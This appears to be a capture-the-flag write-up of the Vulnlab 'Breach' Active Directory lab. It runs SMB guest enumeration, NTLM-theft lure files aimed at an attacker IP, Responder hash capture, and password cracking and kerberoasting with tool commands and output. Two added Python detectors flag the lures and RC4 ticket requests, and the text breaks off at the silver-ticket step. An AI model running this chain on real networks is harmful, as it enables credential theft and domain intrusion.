Breach Vulnlab

Sebin Thomas

In this machine, we exploit guest access to upload NTLM-stealing files, capturing an NTLMv2 hash for a user and cracking it to obtain valid credentials. We validate these credentials to gain access to the target system. During our exploration, we identify a kerberoastable user, allowing us access to MSSQL after creating a silver ticket. We then use the Potato exploit to escalate our privileges, ultimately gaining an admin shell.

Scanning

```bash
➜  Breach nmap -v 10.10.125.188 -sCV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 04:54 EST
Nmap scan report for 10.10.125.188
Host is up (0.25s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 09:55:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-03T09:55:29+00:00
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-02T09:54:15
| Not valid after: 2025-05-04T09:54:15
| MD5: 779a:2dfc:9c51:9add:a59a:0cd1:6882:4b29
|_SHA-1: b75b:c165:8364:5b4a:d739:cdaa:d9f4:a0c5:3f10:e078
|_ssl-date: 2024-11-03T09:56:08+00:00; 0s from scanner time.
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-11-03T09:55:30
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

NSE: Script Post-scanning.
Initiating NSE at 04:56
Completed NSE at 04:56, 0.00s elapsed
Initiating NSE at 04:56
Completed NSE at 04:56, 0.00s elapsed
Initiating NSE at 04:56
Completed NSE at 04:56, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.14 seconds
Raw packets sent: 1996 (87.800KB) | Rcvd: 39 (3.394KB)
➜ Breach
```

Enumeration

Using nxc, I first checked for SMB shares with guest access:

```bash
➜  Breach nxc smb 10.10.125.188 -u 'guest' -p '' --shares
SMB 10.10.125.188 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:
SMB 10.10.125.188 445 BREACHDC [+] breach.vl\guest:
SMB 10.10.125.188 445 BREACHDC [*] Enumerated shares
SMB 10.10.125.188 445 BREACHDC Share Permissions Remark
SMB 10.10.125.188 445 BREACHDC ----- ----------- ------
SMB 10.10.125.188 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.125.188 445 BREACHDC C$ Default share
SMB 10.10.125.188 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.125.188 445 BREACHDC NETLOGON Logon server share
SMB 10.10.125.188 445 BREACHDC share READ,WRITE
SMB 10.10.125.188 445 BREACHDC SYSVOL Logon server share
SMB 10.10.125.188 445 BREACHDC Users READ
➜ Breach
```

The share named share grants guest both read and write permissions, and the Users share grants read access, which is potentially useful for exploring user profiles.

I browsed the Users and share shares using smbclient:

```bash
➜ Breach smbclient \\\\10.10.125.188\\Users -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Thu Feb 17 08:12:16 2022
.. DHS 0 Thu Feb 17 10:38:00 2022
Default DHR 0 Thu Feb 10 04:10:33 2022
desktop.ini AHS 174 Sat May 8 04:18:31 2021
Public DR 0 Tue Sep 14 23:08:59 2021

7863807 blocks of size 4096. 2594389 blocks available
smb: \> cd Desktop
cd \Desktop\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> ls
. DR 0 Thu Feb 17 08:12:16 2022
.. DHS 0 Thu Feb 17 10:38:00 2022
Default DHR 0 Thu Feb 10 04:10:33 2022
desktop.ini AHS 174 Sat May 8 04:18:31 2021
Public DR 0 Tue Sep 14 23:08:59 2021

7863807 blocks of size 4096. 2594381 blocks available
smb: \> cd Default\
smb: \Default\> ls
. DHR 0 Thu Feb 10 04:10:33 2022
.. DR 0 Thu Feb 17 08:12:16 2022
AppData DH 0 Thu Aug 19 02:45:22 2021
Desktop DR 0 Thu Aug 19 02:24:36 2021
Documents DR 0 Wed Feb 9 19:59:34 2022
Downloads DR 0 Sat May 8 04:20:24 2021
Favorites DR 0 Sat May 8 04:20:24 2021
Links DR 0 Sat May 8 04:20:24 2021
Music DR 0 Sat May 8 04:20:24 2021
NTUSER.DAT AHn 524288 Thu Feb 17 10:38:01 2022
ntuser.ini AHSn 20 Thu Aug 19 02:45:22 2021
Pictures DR 0 Sat May 8 04:20:24 2021
Saved Games Dn 0 Sat May 8 04:20:24 2021
Videos DR 0 Sat May 8 04:20:24 2021

7863807 blocks of size 4096. 2594368 blocks available
smb: \Default\> cd Desktop\
smb: \Default\Desktop\> ls
. DR 0 Thu Aug 19 02:24:36 2021
.. DHR 0 Thu Feb 10 04:10:33 2022
EC2 Feedback.website A 527 Tue Jun 21 11:36:17 2016
EC2 Microsoft Windows Guide.website A 554 Tue Jun 21 11:36:23 2016

7863807 blocks of size 4096. 2594368 blocks available
smb: \Default\Desktop\> cd /
smb: \> ls
. DR 0 Thu Feb 17 08:12:16 2022
.. DHS 0 Thu Feb 17 10:38:00 2022
Default DHR 0 Thu Feb 10 04:10:33 2022
desktop.ini AHS 174 Sat May 8 04:18:31 2021
Public DR 0 Tue Sep 14 23:08:59 2021

7863807 blocks of size 4096. 2594367 blocks available
smb: \> cd Public
smb: \Public\> ls
. DR 0 Tue Sep 14 23:08:59 2021
.. DR 0 Thu Feb 17 08:12:16 2022
AccountPictures DHR 0 Thu Feb 17 08:12:33 2022
desktop.ini AHS 174 Sat May 8 04:18:31 2021
Documents DR 0 Wed Aug 18 19:34:55 2021
Downloads DR 0 Sat May 8 04:20:26 2021
Libraries DHR 0 Sat May 8 04:34:49 2021
Music DR 0 Sat May 8 04:20:26 2021
Pictures DR 0 Sat May 8 04:20:26 2021
Videos DR 0 Sat May 8 04:20:26 2021

7863807 blocks of size 4096. 2594367 blocks available
smb: \Public\> exit
➜ Breach smbclient \\\\10.10.91.44\\share -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Feb 17 09:11:08 2022
.. DHS 0 Thu Feb 17 10:38:00 2022
finance D 0 Thu Feb 17 06:19:34 2022
software D 0 Thu Feb 17 06:19:12 2022
transfer D 0 Thu Feb 17 09:00:35 2022

7863807 blocks of size 4096. 2593844 blocks available
smb: \> cd finance
smb: \finance\> ls
. D 0 Thu Feb 17 06:19:34 2022
.. D 0 Thu Feb 17 09:11:08 2022

7863807 blocks of size 4096. 2593844 blocks available
smb: \finance\> cd ../software
smb: \software\> ls
. D 0 Thu Feb 17 06:19:12 2022
.. D 0 Thu Feb 17 09:11:08 2022

7863807 blocks of size 4096. 2593844 blocks available
smb: \software\> cd ../transfer
smb: \transfer\> ls
. D 0 Thu Feb 17 09:00:35 2022
.. D 0 Thu Feb 17 09:11:08 2022
claire.pope D 0 Thu Feb 17 06:21:35 2022
diana.pope D 0 Thu Feb 17 06:21:19 2022
julia.wong D 0 Thu Feb 17 06:24:39 2022

7863807 blocks of size 4096. 2593836 blocks available
smb: \transfer\> cd claire.pope\
smb: \transfer\claire.pope\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\*
smb: \transfer\claire.pope\> cd ..
smb: \transfer\> cd diana.pope\
smb: \transfer\diana.pope\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\*
smb: \transfer\diana.pope\> cd ../julia.wong\
smb: \transfer\julia.wong\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\julia.wong\*
smb: \transfer\julia.wong\> cd ..
smb: \transfer\> ls
. D 0 Thu Feb 17 09:00:35 2022
.. D 0 Thu Feb 17 09:11:08 2022
claire.pope D 0 Thu Feb 17 06:21:35 2022
diana.pope D 0 Thu Feb 17 06:21:19 2022
julia.wong D 0 Thu Feb 17 06:24:39 2022

7863807 blocks of size 4096. 2595871 blocks available
smb: \transfer\> cd ..
smb: \> ls
. D 0 Thu Feb 17 09:11:08 2022
.. DHS 0 Thu Feb 17 10:38:00 2022
finance D 0 Thu Feb 17 06:19:34 2022
software D 0 Thu Feb 17 06:19:12 2022
transfer D 0 Thu Feb 17 09:00:35 2022

7863807 blocks of size 4096. 2595867 blocks available
smb: \>
```

I found nothing more useful than three usernames:

```bash
diana.pope
julia.wong
claire.pope
```

Since we can upload anything to the share share, I used the ntlm_theft.py tool to generate files that trigger NTLM authentication when accessed. When a user browses to or opens them, the target machine sends an NTLMv2 response to my Responder listener.

```bash
➜ Breach python3 /home/kali/Tools/tools/ActiveDirectory/ntlm_theft/ntlm_theft.py --generate all --server 10.8.3.249 -f breach
Created: breach/breach.scf (BROWSE TO FOLDER)
Created: breach/breach-(url).url (BROWSE TO FOLDER)
Created: breach/breach-(icon).url (BROWSE TO FOLDER)
Created: breach/breach.lnk (BROWSE TO FOLDER)
Created: breach/breach.rtf (OPEN)
Created: breach/breach-(stylesheet).xml (OPEN)
Created: breach/breach-(fulldocx).xml (OPEN)
Created: breach/breach.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: breach/breach-(includepicture).docx (OPEN)
Created: breach/breach-(remotetemplate).docx (OPEN)
Created: breach/breach-(frameset).docx (OPEN)
Created: breach/breach-(externalcell).xlsx (OPEN)
Created: breach/breach.wax (OPEN)
Created: breach/breach.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: breach/breach.asx (OPEN)
Created: breach/breach.jnlp (OPEN)
Created: breach/breach.application (DOWNLOAD AND OPEN)
Created: breach/breach.pdf (OPEN AND ALLOW)
Created: breach/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: breach/Autorun.inf (BROWSE TO FOLDER)
Created: breach/desktop.ini (BROWSE TO FOLDER)
Generation Complete.
➜ Breach
```

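The lure files above all work the same way: they embed a UNC or file:// reference to a host the victim's machine will connect and authenticate to without asking. From the defender's side, that is also what makes them easy to spot on a writable share. The following is an added example written for this writeup (not part of the original post or of the ntlm_theft project): it scans a set of share files for UNC/file:// references to hosts outside an allowlist, in both ASCII and UTF-16LE text, and rates the finding higher when the file type is one Explorer renders automatically. The trusted hosts, the 10.10.0.0/16 internal range and the file contents are constructed assumptions; 10.8.3.249 is the listener address from this writeup.

```python
"""Spot NTLM-capture lure files dropped on a writable SMB share.

Added example for this writeup, not part of the original post or of the
ntlm_theft project. The lure formats embed a UNC or file:// reference to an
attacker host that Windows follows and authenticates to automatically, so the
check is: which files reference a host we do not recognise?
"""
from __future__ import annotations
import ipaddress
import re

# Hosts and ranges that legitimately appear in UNC paths on this network (assumption).
TRUSTED_HOSTS = {"breachdc", "breachdc.breach.vl"}
TRUSTED_NETS = [ipaddress.ip_network("10.10.0.0/16")]   # constructed internal range

# Formats that Explorer dereferences just by listing the folder, no click needed.
AUTO_RENDER_EXT = {".scf", ".url", ".lnk", ".library-ms"}
AUTO_RENDER_NAMES = {"desktop.ini", "autorun.inf"}

# \\host\  or  file://host/  in ASCII, and the same in UTF-16LE (Windows-authored .ini/.url).
UNC_ASCII = re.compile(rb"(?:\\\\|file://+)([A-Za-z0-9._-]+)[\\/]", re.I)
UNC_UTF16 = re.compile(
    rb"(?:\\\x00\\\x00|f\x00i\x00l\x00e\x00:\x00/\x00/\x00)((?:[A-Za-z0-9._-]\x00)+)[\\/]\x00", re.I)


def host_is_trusted(host: str) -> bool:
    """Allowlisted name, or an IP inside an internal range. Unknown names are untrusted."""
    host = host.lower().rstrip(".")
    if host in TRUSTED_HOSTS:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def referenced_hosts(data: bytes) -> set[str]:
    """Every host named by a UNC or file:// reference in the file, any encoding."""
    hosts = {m.group(1).decode("ascii", "replace") for m in UNC_ASCII.finditer(data)}
    hosts |= {m.group(1).decode("utf-16-le", "replace") for m in UNC_UTF16.finditer(data)}
    return hosts


def classify(filename: str, data: bytes) -> dict | None:
    """Return a finding for a suspected lure, or None when every referenced host is trusted."""
    base = filename.lower().rsplit("/", 1)[-1]
    ext = base[base.rfind("."):] if "." in base else ""
    auto_render = base in AUTO_RENDER_NAMES or ext in AUTO_RENDER_EXT
    bad_hosts = sorted(h for h in referenced_hosts(data) if not host_is_trusted(h))
    if not bad_hosts:
        return None
    return {"file": filename, "hosts": bad_hosts,
            "severity": "high" if auto_render else "medium"}


def scan_share(files: dict[str, bytes]) -> list[dict]:
    """Run classify() over a path -> content mapping and keep the findings."""
    return [f for f in (classify(name, data) for name, data in files.items()) if f]


# Constructed sample share contents, modelled on the lure types generated above.
SAMPLE_SHARE = {
    "transfer/breach.scf": (b"[Shell]\r\nCommand=2\r\nIconFile=\\\\10.8.3.249\\share\\test.ico\r\n"
                            b"[Taskbar]\r\nCommand=ToggleDesktop\r\n"),
    "transfer/breach-(url).url": b"[InternetShortcut]\r\nURL=file://10.8.3.249/share/test.html\r\n",
    "transfer/desktop.ini": b"[.ShellClassInfo]\r\nIconResource=\\\\10.8.3.249\\share\\icon.ico\r\n",
    # Same trick in UTF-16LE, as Windows often writes .ini/.url files.
    "transfer/notes.url": "[InternetShortcut]\r\nURL=\\\\10.8.3.249\\share\\x\r\n".encode("utf-16-le"),
    # Benign: a shortcut into the domain controller's own share.
    "finance/budget.url": b"[InternetShortcut]\r\nURL=file://BREACHDC.breach.vl/share/budget.xlsx\r\n",
    "software/readme.txt": b"Install instructions: run setup.exe from this folder.\r\n",
}

if __name__ == "__main__":
    for finding in scan_share(SAMPLE_SHARE):
        print(f"{finding['severity']:6} {finding['file']} -> {', '.join(finding['hosts'])}")
```

Run against the constructed share, the four lure files are reported as high severity pointing at 10.8.3.249, while the shortcut to BREACHDC and the plain text file are left alone. The same logic applies to a directory walk of a mounted share; the piece that matters is that a guest-writable share is reviewed for files referencing hosts nobody recognises, and that guest write access is removed in the first place.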
Once the files were generated, I uploaded them to the writable share on the Breach machine so that NTLM authentication would be triggered when a user on the target accessed them:

```bash
➜ Breach smbclient \\\\10.10.125.188\\share -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Feb 17 09:11:08 2022
.. DHS 0 Thu Feb 17 10:38:00 2022
finance D 0 Thu Feb 17 06:19:34 2022
software D 0 Thu Feb 17 06:19:12 2022
transfer D 0 Thu Feb 17 09:00:35 2022

7863807 blocks of size 4096. 2611148 blocks available
smb: \> cd transfer\
smb: \transfer\> ls
. D 0 Thu Feb 17 09:00:35 2022
.. D 0 Thu Feb 17 09:11:08 2022
claire.pope D 0 Thu Feb 17 06:21:35 2022
diana.pope D 0 Thu Feb 17 06:21:19 2022
julia.wong D 0 Thu Feb 17 06:24:39 2022

7863807 blocks of size 4096. 2611148 blocks available
smb: \transfer\> recurse
smb: \transfer\> prompt
smb: \transfer\> mput *
putting file breach-(frameset).docx as \transfer\breach-(frameset).docx (20.0 kb/s) (average 20.0 kb/s)
putting file zoom-attack-instructions.txt as \transfer\zoom-attack-instructions.txt (0.2 kb/s) (average 10.2 kb/s)
putting file breach.rtf as \transfer\breach.rtf (0.2 kb/s) (average 6.9 kb/s)
putting file breach.scf as \transfer\breach.scf (0.2 kb/s) (average 5.1 kb/s)
putting file Autorun.inf as \transfer\Autorun.inf (0.2 kb/s) (average 4.2 kb/s)
putting file breach.htm as \transfer\breach.htm (0.2 kb/s) (average 3.5 kb/s)
putting file breach.m3u as \transfer\breach.m3u (0.1 kb/s) (average 2.9 kb/s)
putting file breach-(externalcell).xlsx as \transfer\breach-(externalcell).xlsx (11.7 kb/s) (average 3.9 kb/s)
putting file breach-(url).url as \transfer\breach-(url).url (0.1 kb/s) (average 3.5 kb/s)
putting file breach-(fulldocx).xml as \transfer\breach-(fulldocx).xml (85.8 kb/s) (average 15.9 kb/s)
putting file breach-(includepicture).docx as \transfer\breach-(includepicture).docx (16.5 kb/s) (average 15.9 kb/s)
putting file breach.lnk as \transfer\breach.lnk (3.9 kb/s) (average 15.0 kb/s)
putting file breach.pdf as \transfer\breach.pdf (0.1 kb/s) (average 5.8 kb/s)
putting file breach.wax as \transfer\breach.wax (0.0 kb/s) (average 4.9 kb/s)
putting file breach-(icon).url as \transfer\breach-(icon).url (0.2 kb/s) (average 4.7 kb/s)
putting file breach.application as \transfer\breach.application (2.8 kb/s) (average 4.7 kb/s)
putting file breach.asx as \transfer\breach.asx (0.2 kb/s) (average 4.6 kb/s)
putting file breach.jnlp as \transfer\breach.jnlp (0.3 kb/s) (average 4.5 kb/s)
putting file breach-(stylesheet).xml as \transfer\breach-(stylesheet).xml (0.2 kb/s) (average 4.3 kb/s)
putting file breach-(remotetemplate).docx as \transfer\breach-(remotetemplate).docx (23.0 kb/s) (average 5.2 kb/s)
putting file desktop.ini as \transfer\desktop.ini (0.1 kb/s) (average 5.0 kb/s)
smb: \transfer\> exit
```

After uploading all the theft files to the share, Responder captured an NTLMv2 hash for the user Julia.Wong:

```bash
➜  Breach sudo responder -I tun0

NBT-NS, LLMNR & MDNS Responder 3.1.5.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.8.3.249]
Responder IPv6 [fe80::8324:bd2d:eee6:ed4f]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]

[+] Current Session Variables:
Responder Machine Name [WIN-8AE4H5Y72AG]
Responder Domain Name [9R1O.LOCAL]
Responder DCE-RPC Port [47249]

[+] Listening for events...

[SMB] NTLMv2-SSP Client : 10.10.91.44
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash : Julia.Wong::BREACH:3fb0618fee[...]
[*] Skipping previously captured hash for BREACH\Julia.Wong
[*] Skipping previously captured hash for BREACH\Julia.Wong
[*] Skipping previously captured hash for BREACH\Julia.Wong
```

With the captured hash, I used John the Ripper and the rockyou.txt wordlist to crack the password for Julia.Wong:

```bash
➜  Breach john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[....] (Julia.Wong)
1g 0:00:00:00 DONE (2024-10-30 07:47) 12.50g/s 1510Kp/s 1510Kc/s 1510KC/s bratz1234..042602
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```

After cracking the NTLMv2 hash for Julia.Wong, I validated the credentials using nxc.

Initial access

```bash
➜ Breach nxc smb 10.10.91.44 -u Julia.Wong -p [....]
SMB 10.10.91.44 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.10.91.44 445 BREACHDC [+] breach.vl\Julia.Wong:[...]
```

Now that I had valid domain credentials, I checked for kerberoastable users with the ADenum tool:

```bash
➜  Breach python3 ~/Tools/ADenum/ADenum.py -d breach.vl -u Julia.Wong -p [...] -ip 10.10.91.44

[*] Domain name: breach.vl
[*] Username: Julia.Wong
[*] IP Address: 10.10.91.44
[!] SSL supported: FALSE
[!] SSL connect: FALSE

[+] Succesfully Authenticated With LDAP

[-] Authentication mechanism
[+] GSSAPI
[+] GSS-SPNEGO
[+] EXTERNAL
[!] DIGEST-MD5 Consider as weak security protocols
[-] LOGIN Plaintext password
[-] PLAIN Plaintext password

====================================================
===================== Enum LDAP ====================
====================================================



[-] Users who are Domain Admin
[*] Username: Administrator CN=Administrator,CN=Users,DC=breach,DC=vl
[*] Username: Julia.Wong CN=Julia Wong,OU=staff,DC=breach,DC=vl
[*] Username: Christine.Bruce CN=Christine Bruce,OU=staff,DC=breach,DC=vl

[-] Domain Controllers
[*] Computer: BREACHDC$ CN=BREACHDC,OU=Domain Controllers,DC=breach,DC=vl
[V] Windows Server 2022 Datacenter 10.0 (20348)

[-] Users with Password Not Expire
[*] Username: Guest CN=Guest,CN=Users,DC=breach,DC=vl
[*] Username: Claire.Pope CN=Claire Pope,OU=staff,DC=breach,DC=vl
[*] Username: Julia.Wong CN=Julia Wong,OU=staff,DC=breach,DC=vl
[*] Username: Hilary.Reed CN=Hilary Reed,OU=staff,DC=breach,DC=vl
[*] Username: Diana.Pope CN=Diana Pope,OU=staff,DC=breach,DC=vl
[*] Username: Jasmine.Price CN=Jasmine Price,OU=staff,DC=breach,DC=vl
[*] Username: George.Williams CN=George Williams,OU=staff,DC=breach,DC=vl
[*] Username: Lawrence.Kaur CN=Lawrence Kaur,OU=staff,DC=breach,DC=vl
[*] Username: Jasmine.Slater CN=Jasmine Slater,OU=staff,DC=breach,DC=vl
[*] Username: Hugh.Watts CN=Hugh Watts,OU=staff,DC=breach,DC=vl
[*] Username: Christine.Bruce CN=Christine Bruce,OU=staff,DC=breach,DC=vl
[*] Username: svc_mssql CN=svc_mssql,CN=Users,DC=breach,DC=vl

[-] Users with old password
[!] Username: Administrator Password last change: 985 days ago 2022-02-17 09:33:46
[!] Username: Guest Password last change: 985 days ago 2022-02-17 13:36:50
[!] Username: krbtgt Password last change: 985 days ago 2022-02-17 10:04:57
[!] Username: Claire.Pope Password last change: 985 days ago 2022-02-17 10:36:11
[!] Username: Julia.Wong Password last change: 985 days ago 2022-02-17 12:58:50
[!] Username: Hilary.Reed Password last change: 985 days ago 2022-02-17 10:36:11
[!] Username: Diana.Pope Password last change: 985 days ago 2022-02-17 10:36:11
[!] Username: Jasmine.Price Password last change: 985 days ago 2022-02-17 10:36:11
[!] Username: George.Williams Password last change: 985 days ago 2022-02-17 10:36:11
[!] Username: Lawrence.Kaur Password last change: 985 days ago 2022-02-17 10:36:12
[!] Username: Jasmine.Slater Password last change: 985 days ago 2022-02-17 10:36:12
[!] Username: Hugh.Watts Password last change: 985 days ago 2022-02-17 10:36:12
[!] Username: Christine.Bruce Password last change: 985 days ago 2022-02-17 10:36:12
[!] Username: svc_mssql Password last change: 985 days ago 2022-02-17 10:43:08

[-] Users with an interesting description
[!] No entry found !

[-] Users with not the default encryption
[*] Username: krbtgt Password is in a reversible encryption or in DES !

[-] Protecting Privileged Domain Accounts
[!] No entry found !

[-] Not Default Attributes (TEST IN BETA)

[!] No entry found !

[-] Laps Password
[!] No entry found !


====================================================
==================== Attack AD =====================
====================================================


[-] AS-REP Roastable Users
[!] No entry found !

[-] Kerberoastable Users
[*] Username: svc_mssql CN=svc_mssql,CN=Users,DC=breach,DC=vl
[+] Hash added to file: kerbHash.hash

[-] Starting to crack hashs
[!] No entry found !

➜ Breach
```

This showed that the svc_mssql account is kerberoastable. With the TGS hash that ADenum wrote to kerbHash.hash, I used john to crack the password:

```bash
➜  Breach john kerbHash.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[...] (?)
1g 0:00:00:00 DONE (2024-10-30 08:05) 33.33g/s 1740Kp/s 1740Kc/s 1740KC/s chloelouise..lili12
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
➜ Breach
```

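The john output is the key detail for a defender: the ticket was issued with etype 23 (RC4-HMAC), which is the only reason a wordlist attack on it is practical. On a domain controller this leaves a trace in Security event 4769 (a service ticket was requested) as TicketEncryptionType 0x17 for a user-account SPN. The following is an added example written for this writeup, not part of the original post or of ADenum: it runs that detection over constructed 4769 records, flagging successful RC4 service tickets for non-computer accounts and any single source that requests several distinct SPNs within a short window. The svc_backup and svc_web service names, the Hugh.Watts and Diana.Pope requests and the timestamps are constructed sample data, not events from the lab.

```python
"""Flag Kerberoasting from Windows Security event 4769 (TGS request) records.

Added example for this writeup, not from the original post or any tool it
uses. Two signals: a successful TGS request for a user-account SPN with
TicketEncryptionType 0x17 (RC4-HMAC, the crackable etype), and one source
asking for many distinct SPNs in a short window. The records are constructed
to resemble 4769 EventData fields; they are not real logs.
"""
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"
IGNORED_SERVICES = {"krbtgt"}   # TGT renewals, not a roasting target in this sense

# Constructed 4769 records. "etype" is TicketEncryptionType, "status" the Kerberos result code.
EVENTS_4769 = [
    {"time": "2024-11-03T10:01:05", "account": "Julia.Wong@BREACH.VL", "service": "BREACHDC$",
     "etype": "0x12", "ip": "::ffff:10.10.91.44", "status": "0x0"},
    {"time": "2024-11-03T10:02:11", "account": "Julia.Wong@BREACH.VL", "service": "svc_mssql",
     "etype": "0x17", "ip": "::ffff:10.8.3.249", "status": "0x0"},
    {"time": "2024-11-03T10:02:12", "account": "Julia.Wong@BREACH.VL", "service": "svc_backup",
     "etype": "0x17", "ip": "::ffff:10.8.3.249", "status": "0x0"},
    {"time": "2024-11-03T10:02:12", "account": "Julia.Wong@BREACH.VL", "service": "svc_web",
     "etype": "0x17", "ip": "::ffff:10.8.3.249", "status": "0x0"},
    # Normal use of the SQL service from a domain workstation: AES ticket, not flagged.
    {"time": "2024-11-03T10:30:00", "account": "Hugh.Watts@BREACH.VL", "service": "svc_mssql",
     "etype": "0x12", "ip": "::ffff:10.10.50.12", "status": "0x0"},
    # Failed request (KDC_ERR_POLICY): no ticket material was issued, so not flagged.
    {"time": "2024-11-03T10:31:00", "account": "Diana.Pope@BREACH.VL", "service": "svc_mssql",
     "etype": "0x17", "ip": "::ffff:10.10.50.13", "status": "0xc"},
]


def is_user_service(service: str) -> bool:
    """Computer accounts (trailing $) and krbtgt are not what Kerberoasting targets."""
    name = service.split("/")[0].split("@")[0]
    return not name.endswith("$") and name.lower() not in IGNORED_SERVICES


def rc4_service_tickets(events: list[dict]) -> list[dict]:
    """Successful TGS requests for user-account SPNs encrypted with RC4-HMAC."""
    return [e for e in events
            if e["status"] == "0x0" and e["etype"] == RC4_HMAC and is_user_service(e["service"])]


def burst_requesters(events: list[dict], window: timedelta = timedelta(minutes=5),
                     min_spns: int = 3) -> dict[tuple[str, str], set[str]]:
    """(account, ip) pairs that obtained RC4 tickets for >= min_spns distinct SPNs within `window`."""
    by_source: dict[tuple[str, str], list[tuple[datetime, str]]] = defaultdict(list)
    for e in rc4_service_tickets(events):
        by_source[(e["account"], e["ip"])].append((datetime.fromisoformat(e["time"]), e["service"]))
    flagged: dict[tuple[str, str], set[str]] = {}
    for source, requests in by_source.items():
        requests.sort()
        for i, (t0, _) in enumerate(requests):            # slide the window from each request
            spns = {spn for t, spn in requests[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                flagged[source] = spns
                break
    return flagged


if __name__ == "__main__":
    for e in rc4_service_tickets(EVENTS_4769):
        print(f"RC4 service ticket: {e['account']} -> {e['service']} from {e['ip']} at {e['time']}")
    for (account, ip), spns in burst_requesters(EVENTS_4769).items():
        print(f"Burst: {account} from {ip} requested {len(spns)} SPNs: {sorted(spns)}")
```

On the constructed data the three RC4 tickets pulled from 10.8.3.249 are reported individually, and the same source is also flagged as a burst requester; Hugh.Watts' AES ticket and Diana.Pope's rejected request are not. The rule is most useful once service accounts are configured for AES only (msDS-SupportedEncryptionTypes) and hold long random passwords or are gMSAs: an RC4 request for such an SPN then either fails outright or is a legacy client worth investigating, and a cracked ticket cannot happen in the first place.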
With this username and password we can reach MSSQL. Using the NT hash of the cracked password and the domain SID, I generated a silver ticket for the svc_mssql SPN with ticketer.py so that I could access MSSQL as administrator:

```bash
